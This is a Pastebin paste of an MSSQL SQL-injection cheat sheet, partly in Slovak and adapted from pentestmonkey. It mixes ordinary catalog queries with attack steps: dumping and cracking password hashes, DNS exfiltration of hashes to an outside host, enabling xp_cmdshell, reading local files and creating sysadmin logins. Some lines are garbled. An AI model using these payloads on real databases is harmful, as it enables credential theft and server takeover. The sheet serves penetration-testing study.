Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- 01. Otvor a prejdi si zoznam skriptov
- -- https://pastebin.com/gXz34tXk
- -- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
- -- Verzia
- SELECT @@version
- -- Komentáre
- SELECT 1 -- Komentár
- SELECT /* Komentár */ 1
- -- Aktuálny používateľ
- SELECT user_name();
- SELECT system_user;
- SELECT user;
- SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;
- -- Vypísanie procesu konkrétneho používateľa
- EXEC sp_who [ [ @loginame = ] 'login' | session ID | 'ACTIVE' ];
- -- Zobrazenie všetkých aktívnych procesov
- EXEC sp_who 'active';
- -- Vypísanie procesu konkrétneho používateľa
- EXEC sp_who 'MSI_MR_FIRMA\IT Academy';
- -- Zobrazenie konkrétneho procesu identifikovaného pomocou ID relácie
- EXEC sp_who '10' -- špecifikuje process_id;
- -- Zoznam používateľov
- SELECT name FROM master..syslogins
- -- Zoznam DB
- SELECT name, database_id, create_date FROM sys.databases;
- SELECT name FROM master.sys.databases;
- SELECT name FROM master.dbo.sysdatabases;
- -- To exclude system databases:
- -- WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
- -- SELECT [name]
- -- FROM master.dbo.sysdatabases
- -- WHERE database_id > 6
- SELECT name, database_id, create_date
- FROM sys.databases
- WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb')
- and database_id > 7;
- EXEC sp_databases;
- -- show databases;
- --USE AdventureWorks2017;
- --GO
- --SELECT name, database_id, create_date
- --FROM sys.databases ;
- --GO
- -- Zoznam hash hesiel
- SELECT name, password FROM master..syslogins -- priv, mssql 2000;
- SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..syslogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
- SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
- SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
- -- Password Cracker
- MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
- -- List Privileges – current privs on a particular object in 2005, 2008
- -- current database
- SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE');
- -- current server
- SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER');
- -- permissions on a table
- SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT');
- SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
- -- Permissions on a user– current privs in 2005, 2008
- SELECT is_srvrolemember('sysadmin');
- SELECT is_srvrolemember('dbcreator');
- SELECT is_srvrolemember('bulkadmin');
- SELECT is_srvrolemember('diskadmin');
- SELECT is_srvrolemember('processadmin');
- SELECT is_srvrolemember('serveradmin');
- SELECT is_srvrolemember('setupadmin');
- SELECT is_srvrolemember('securityadmin');
- -- who has a particular priv? 2005, 2008
- SELECT name FROM master..syslogins WHERE denylogin = 0;
- SELECT name FROM master..syslogins WHERE hasaccess = 1;
- SELECT name FROM master..syslogins WHERE isntname = 0;
- SELECT name FROM master..syslogins WHERE isntgroup = 0;
- SELECT name FROM master..syslogins WHERE sysadmin = 1;
- SELECT name FROM master..syslogins WHERE securityadmin = 1;
- SELECT name FROM master..syslogins WHERE serveradmin = 1;
- SELECT name FROM master..syslogins WHERE setupadmin = 1;
- SELECT name FROM master..syslogins WHERE processadmin = 1;
- SELECT name FROM master..syslogins WHERE diskadmin = 1;
- SELECT name FROM master..syslogins WHERE dbcreator = 1;
- SELECT name FROM master..syslogins WHERE bulkadmin = 1;
- -- List DBA Accounts
- -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation
- SELECT is_srvrolemember('sysadmin');
- -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
- SELECT is_srvrolemember('sysadmin', 'sa');
- -- tested on 2005
- SELECT name FROM master..syslogins WHERE sysadmin = '1';
- -- Current Database
- SELECT DB_NAME();
- -- List Databases
- SELECT name FROM master..sysdatabases;
- -- Za N = 0, 1, 2, …
- SELECT DB_NAME(N);
- -- List Columns
- -- For the current DB only
- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
- SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
- -- list colum names and types for master..sometable
- List Tables SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
- SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
- SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
- -- list colum names and types for master..sometable
- -- Find Tables From Column Name – NB: This example works only for the current database. If you want to
- -- search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
- SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' — this lists table, column for each column containing the word 'password'
- -- Select Nth Row
- SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
- -- gets 9th row
- -- Select Nth Char
- SELECT substring('abcd', 3, 1) -- returns c
- -- Bitwise AND
- SELECT 6 & 2 -- returns 2
- SELECT 6 & 1 -- returns 0
- ASCII Value -> Char SELECT char(0×41) -- returns A
- Char -> ASCII Value SELECT ascii('A') -- returns 65
- -- Casting
- SELECT CAST('1' as int);
- SELECT CAST(1 as char)
- -- String Concatenation
- SELECT 'A' + 'B' -- returns AB
- -- If Statement
- IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
- -- Case Statement
- SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
- -- Avoiding Quotes SELECT char(65)+char(66) -- returns AB
- -- Time Delay
- WAITFOR DELAY '0:0:5′ -- pause for 5 seconds
- -- Make DNS Requests
- declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails '\' + @host + 'c$boot.ini'); -- nonpriv, works on 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ”\' + @host + 'c$boot.ini”'); -- priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
- – Also check out theDNS tunnel feature of sqlninja
- -- Command Execution
- EXEC xp_cmdshell 'net user';
- -- privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
- EXEC sp_configure 'show advanced options', 1; -- priv
- RECONFIGURE; -- priv
- EXEC sp_configure 'xp_cmdshell', 1; -- priv
- RECONFIGURE; -- priv
- -- Local File Access
- CREATE TABLE mydata (line varchar(8000));
- BULK INSERT mydata FROM 'c:boot.ini';
- DROP TABLE mydata;
- -- Hostname, IP Address
- SELECT HOST_NAME()
- -- Create Users
- EXEC sp_addlogin 'user', 'pass'; -- priv
- --Drop Users
- EXEC sp_droplogin 'user'; -- priv
- -- Make User DBA
- EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv
- -- Location of DB files
- EXEC sp_helpdb master; -- location of master.mdf
- EXEC sp_helpdb pubs; -- location of pubs.mdf
- -- Default/System Databases northwind
- model
- msdb
- pubs -- not on sql server 2005
- tempdb
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement